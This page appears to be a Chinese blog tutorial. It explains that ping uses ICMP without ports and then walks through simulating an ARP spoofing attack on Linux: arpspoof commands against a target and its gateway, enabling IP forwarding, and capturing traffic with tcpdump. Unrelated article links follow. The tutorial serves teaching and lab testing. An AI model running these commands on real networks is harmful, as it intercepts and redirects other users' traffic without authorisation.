ICMP协议以及ARP欺骗攻击
ping 命令使用的是 ICMP(Internet Control Message Protocol)协议,而不是 TCP 或 UDP 协议。因此,ping 命令并不使用特定的端口号。
ICMP 协议
ICMP 是一种网络层协议,主要用于在 IP 网络中传递控制消息。ping 命令利用 ICMP 协议来测试主机之间的连通性,其工作流程如下:
-
发送 ICMP Echo Request(回显请求):
- 源主机(发送
ping命令的主机)发送一个 ICMP Echo Request 消息到目标主机。
- 源主机(发送
-
接收 ICMP Echo Reply(回显应答):
- 如果目标主机在线且未阻止 ICMP 请求,它会返回一个 ICMP Echo Reply 消息给源主机。
-
计算往返时间:
ping命令会计算从发送请求到收到应答的时间,从而得到一个往返时间(RTT)值。
端口的应用
端口号通常用于传输层协议(如 TCP 和 UDP),以标识特定的应用程序或服务。ICMP 作为一种网络层协议,并不使用端口号,而是通过 IP 地址来标识目标主机。
示例
当你在命令行中运行 ping 命令时,例如:
ping 192.168.1.1
你实际上是在发送 ICMP Echo Request 数据包到 IP 地址 192.168.1.1,而不是发送到一个特定的端口号。
结论
ping 命令使用的是 ICMP 协议,而不是特定的端口号。网络层协议(如 ICMP)通过 IP 地址进行通信,而不是通过端口号。
ARP 欺骗(也称为 ARP 中毒或 ARP 欺诈)是一种针对局域网的攻击形式,其中攻击者通过发送伪造的 ARP 消息来获取网络中其他设备的流量。这种攻击主要是为了监听、干扰或重定向网络通信。
模拟 ARP 欺骗的步骤
以下是如何在 Linux 系统(如 Ubuntu)上模拟 ARP 欺骗的基本步骤:
1. 准备工作
确保你有 root 权限或使用 sudo。还需要安装一些网络工具,如 arpspoof(通常包含在 dsniff 包中)。
sudo apt update
sudo apt install dsniff
2. 确定目标
你需要知道在你局域网中的目标 IP 地址和 MAC 地址。可以使用 arp -a 或 ifconfig 等命令来查看网络中的设备。
- 例如:
- 目标设备的 IP:
192.168.18.100 - 默认网关的 IP:
192.168.18.1
- 目标设备的 IP:
你可以使用以下命令来检查路由表,看看默认网关是否是 192.168.18.1:
route -n在输出中,查找 Gateway 列,看看默认网关是否指向 192.168.18.2。示例输出可能如下:
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
0.0.0.0 192.168.18.1 0.0.0.0 UG 0 0 0 ens33
如果 Gateway 是 192.168.18.1,那么这就是你的网关。
默认网关:
0.0.0.0 192.168.18.1 0.0.0.0 UG 100 0 0 ens33- 这条路由规则表明,
192.168.18.1是你的默认网关(Gateway)。所有非本地网络的流量都会通过这个网关进行路由。
本地网络路由:
192.168.18.0 0.0.0.0 255.255.255.0 U 100 0 0 ens33- 这条路由规则表示,
192.168.18.0/24网段内的流量会在本地进行处理,不需要通过网关。
3. 进行 ARP 欺骗
使用 arpspoof 工具进行 ARP 欺骗,以便让目标设备(192.168.18.100)认为攻击者的设备是网关(192.168.18.1)。
在一个终端中,先将目标设备的流量重定向到自己:
sudo arpspoof -i ens33 -t 192.168.18.100 192.168.18.1
在另一个终端中,将网关的流量重定向到自己:
sudo arpspoof -i ens33 -t 192.168.18.1 192.168.18.100
4. 启用 IP 转发(可选)
为了让攻击者能够转发流量,需要启用 IP 转发。可以通过以下命令进行操作:
echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward
- 注意:如果不启用 IP 转发,攻击者的机器将无法转发流量。
检查目标设备的 ARP 表
在 192.168.18.100 设备上,运行以下命令,查看它的 ARP 表:
arp -a
这应该显示出 192.168.18.1 的 MAC 地址。如果没有正确显示你的 MAC 地址,则欺骗失败,还需要确认网络连接是否正常。
5. 捕获流量(可选)
如果希望监控通过你的设备流过的流量,可以使用工具如 tcpdump 或 Wireshark 捕获数据包。
使用 tcpdump 进行简单的流量捕获:
sudo tcpdump -i ens33 -w capture.pcap
6. 结束攻击
完成模拟后,通过按 Ctrl+C 停止 arpspoof 命令,并通过以下命令禁用 IP 转发:
echo 0 | sudo tee /proc/sys/net/ipv4/ip_forward
重要提示
- 确保在合法的环境下进行 ARP 欺骗测试。未经授权的 ARP 欺骗是非法行为。
- ARP 欺骗可能会影响局域网中的其他设备和用户,因此务必谨慎。
- 使用 Wireshark 等工具监控 ARP 流量,帮助你理解 ARP 欺骗的工作原理。
相关文章:
ICMP协议以及ARP欺骗攻击
ping 命令使用的是 ICMP(Internet Control Message Protocol)协议,而不是 TCP 或 UDP 协议。因此,ping 命令并不使用特定的端口号。 ICMP 协议 ICMP 是一种网络层协议,主要用于在 IP 网络中传递控制消息。ping 命令利…...
qt5.12.12插件机制无法加载插件问题
环境:win11 vs2015 qt5.12.12 问题描述:确保插件代码正确的情况下,无法解析插件接口(即QPluginLoader类的instance(); 返回为空)。 问题现象:1、qt5.12.12的debug下无法解析;2、release下禁…...
机器学习面试笔试知识点-线性回归、逻辑回归(Logistics Regression)和支持向量机(SVM)
机器学习面试笔试知识点-线性回归、逻辑回归Logistics Regression和支持向量机SVM 一、线性回归1.线性回归的假设函数2.线性回归的损失函数(Loss Function)两者区别3.简述岭回归与Lasso回归以及使用场景4.什么场景下用L1、L2正则化5.什么是ElasticNet回归6.ElasticNet回归的使…...
SpringBoot民宿预订系统设计与实现
2相关技术 2.1 MYSQL数据库 MySQL是一个真正的多用户、多线程SQL数据库服务器。 是基于SQL的客户/服务器模式的关系数据库管理系统,它的有点有有功能强大、使用简单、管理方便、安全可靠性高、运行速度快、多线程、跨平台性、完全网络化、稳定性等,非常…...
linux环境下C程序的编译过程以及makefile的简单使用
在windows下,很多用来进行编程软件对于写好的文件,点击编译即可生成想要文件。如.exe可执行文件,.hex文件或者.bin文件等等。软件为我们省略了很多事。但是对于linux初学者来说,初次接触linux系统,面对命令行黑框框有点…...
【从零开始的LeetCode-算法】945. 使数组唯一的最小增量
给你一个整数数组 nums 。每次 move 操作将会选择任意一个满足 0 < i < nums.length 的下标 i,并将 nums[i] 递增 1。 返回使 nums 中的每个值都变成唯一的所需要的最少操作次数。 生成的测试用例保证答案在 32 位整数范围内。 示例 1: 输入&am…...
Java程序设计:spring boot(2)
目录 1 Spring MVC 零配置创建与部署 1.1 创建Spring MVC Web⼯程 1.2 pom.xml 添加坐标相关配置 1.3 添加源代码 1.4 添加视图 1.5 SpringMVC 配置类添加 1.6 入口文件代码添加 1.7 部署与测试 2 Spring Boot 概念&特点 2.1 框架概念 2.2 框架特点 2.3 Spring…...
服务器运维监控平台
云监控平台-简介 一:简介 “phoenix” 是一个灵活可配置的开源监控平台,主要用于监控应用程序、服务器、docker、数据库、网络、tcp 端口和 http 接口,通过实时收集、汇聚和分析监控信息,实现在发现异常时立刻推送告警信息&…...
 区别)
css中 global 和 deep(两个样式穿透) 区别
1.:global(selector):这个伪类选择器会选择所有全局的、未被其他样式表覆盖的元素。换句话说,它会匹配所有没有被其他样式表(例如内联样式或外部样式表)所影响的元素。 :global(p) {color: red; }这段代码会将所有 <p> 元素…...
【星闪技术】WS63E模块的WiFi客户端测试
引言 我所计划的WS63E测试要实现MQTT联网,所以首先需要确保开发板连接WiFi。今天来测试一下WiFi功能。 程序分析 WiFi客户端的例子在src/application/samples/wifi/sta_sample目录下。这个例子看上去和hi3861的例子差不多。 这段程序是一个用于嵌入式设备的Wi-F…...
Android面试之5个Kotlin深度面试题:协程、密封类和高阶函数
本文首发于公众号“AntDream”,欢迎微信搜索“AntDream”或扫描文章底部二维码关注,和我一起每天进步一点点 面试题目1:Kotlin中的协程与线程的区别是什么?如何在Android中使用协程进行异步编程? 解答: 协…...
操作系统 和 初识进程
目录 操作系统(OS) 进程 操作系统(OS) 概念 操作系统即os,是一款软件。 任何计算机系统都包含一个基本的程序集合,称为操作系统(OS)。 操作系统的本质是一种进行软硬件管理的软件 笼统的理解…...
QT--Qlabel学习、获取文本和设置文本、文本对齐方式、文本换行、显示图片
QLabel 是 Qt 中的标签类,通常用于显示提示性的文本,也可以显示图像 对齐方式 用于设置标签中的内容在水平和垂直两个方向上的对齐方式,比如左对齐、右对齐、上对齐、下对齐、水平居中、垂直居中等。 // 获取和设置文本的对齐方式 Qt::Ali…...
详解)
深度学习:终身学习(Life-Long Learning)详解
终身学习(Life-Long Learning)详解 终身学习(也称为持续学习或增量学习)是机器学习中的一个重要研究领域,它关注如何使机器学习模型在完成一系列任务后,能够持续学习新任务,而不会忘记之前学到…...
前端UI框架
组件UI类 1.Element-Plus 2.uView 3.Vant 4.TDesign 5.uni-app 6.Tuniao-vue3 7. 可视化图标类 1.可视化图标VUE Data UI 2.Echart 图标库ICON 1.yesicon 2.Flaticon 3.Google Fonts 4.fontawesome 5.阿里巴巴 其他 1.CSS布局 2.web前端样式布局 3.中国色-颜色合集 托管…...
最佳副屏串流解决方案:如何低成本打造电脑拓展副屏?
如何低成本打造电脑拓展副屏?如果你有一台平板和一台电脑,想要提高打游戏、办公或是学习的效率。那么,使用网易GameViewer远程,就能帮你低成本打造电脑拓展副屏。 简单来说,副屏串流就是能让你多出一块显示屏。在打游戏…...
SQL Injection | SQL 注入概述
关注这个漏洞的其他相关笔记:SQL 注入漏洞 - 学习手册-CSDN博客 0x01:SQL 注入漏洞介绍 SQL 注入就是指 Web 应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是可控的,并且参数会带入到数据库中执行,导致…...
【Linux 从基础到进阶】磁盘I/O性能调优
磁盘I/O性能调优 1. 引言 磁盘I/O性能是决定服务器整体性能的关键因素之一。磁盘I/O性能的瓶颈常常会影响数据库、文件系统以及虚拟化平台等关键应用的响应时间。因此,磁盘I/O调优是系统管理员不可忽视的任务。 本文将介绍影响磁盘I/O性能的主要因素,…...
浅谈AGI时代的“数据枢纽”——向量数据库
一、前言 人工智能的关键,不只是构建好算力、算法、模型,更重要的是做好数据的清洗、处理、挖掘等问题。一定程度上,智能时代,企业数据处理能力有多强,决定了业务发展的天花板有多高。 在企业数智化转型过程中&#x…...
生成 Excel 表列名称
Excel 大家都用过,它的列名是用字母编号的,A 表示第一列,B 表示第二列,AA 表示第27列,AB 表示第28列等等。 现给定一个数字,如何得到列名称呢。比如输入28,输出 AB。 一开始以为就是一个简单的…...
C语言goto语句的争议与现代替代方案
1. goto语句的本质与历史争议 goto语句是C语言中最具争议的特性之一。从语法上看,它简单到令人不安——只需一个标签和一行指令,就能让程序执行流发生任意跳转。在早期的编程实践中,这种不受约束的控制流方式确实带来了灵活性,但也…...
数据分析中的异常值处理:MAD
在数据处理(尤其是金融、生物统计、信号处理等)中,极值(异常值) 会严重影响均值、方差、相关系数等统计量的估计,并扭曲模型训练。MAD法(Median Absolute Deviation,绝对中位差法&am…...
遥感图像分割实战:用ResNet50和VGG16改进UNet,哪个模型效果更好?
遥感图像分割实战:UNet架构下ResNet50与VGG16骨干网络的深度对比 当我们需要从高空视角中精确识别建筑物轮廓时,遥感图像分割技术就像给计算机装上"透视眼"。在众多解决方案中,UNet及其变体已成为医学影像和遥感领域的黄金标准。但…...
Music Tag Web:一站式智能音乐标签管理解决方案
Music Tag Web:一站式智能音乐标签管理解决方案 【免费下载链接】music-tag-web 音乐标签编辑器,可编辑本地音乐文件的元数据(Editable local music file metadata.) 项目地址: https://gitcode.com/gh_mirrors/mu/music-tag-we…...
PowerBI主题模板:让数据可视化设计效率提升80%的开源解决方案
PowerBI主题模板:让数据可视化设计效率提升80%的开源解决方案 【免费下载链接】PowerBI-ThemeTemplates Snippets for assembling Power BI Themes 项目地址: https://gitcode.com/gh_mirrors/po/PowerBI-ThemeTemplates 在数据驱动决策的时代,Po…...
C语言:数组详解
C语言:数组详解一.数组的基本概念1.基本概念2.主要特性3.基本操作二.数组的创建、初始化与类型1.一维数组的创建2.一维数组的初始化3.数组的类型4.一维数组的常见操作一维数组下标一维数组元素的打印一维数组的输入与输出5.一维数组的内存结构三.多维数组1.基本概念…...
PETRV2-BEV训练效果对比展示:nuscenes高精度vs xtreme1泛化挑战
PETRV2-BEV训练效果对比展示:nuscenes高精度vs xtreme1泛化挑战 最近在星图AI算力平台上折腾了一下PETRV2-BEV模型,分别用nuscenes和xtreme1两个数据集做了训练和测试。结果挺有意思的,一个在标准数据集上表现不错,另一个在泛化性…...
HiFloat8:高性能训练之路
Float8单数据格式FP8/HiF8训练算法介绍Float8混合精度训练策略随着预训练模型(尤其是基于Transformer架构的大语言模型)参数规模突破千亿级,训练过程面临愈发严重的算力和内存瓶颈,成本极高。在此背景下,8位浮点逐渐成…...
Windows系统优化神器Winhance:让电脑飞起来的终极指南 [特殊字符]
Windows系统优化神器Winhance:让电脑飞起来的终极指南 🚀 【免费下载链接】Winhance-zh_CN A Chinese version of Winhance. C# application designed to optimize and customize your Windows experience. 项目地址: https://gitcode.com/gh_mirrors/…...
2026行李箱推荐别乱买!唯尊、海澜之家、森马、外交官、珉璐保罗五款横评
对于技术从业者而言,行李箱不仅是装载衣物的容器,更是保护精密电子设备、应对高频差旅与跨城迁移的可靠装备。无论是前往异地调试系统、参加技术峰会,还是举家搬迁,一个设计合理、性能可靠的行李箱能显著提升出行效率与体验。本文…...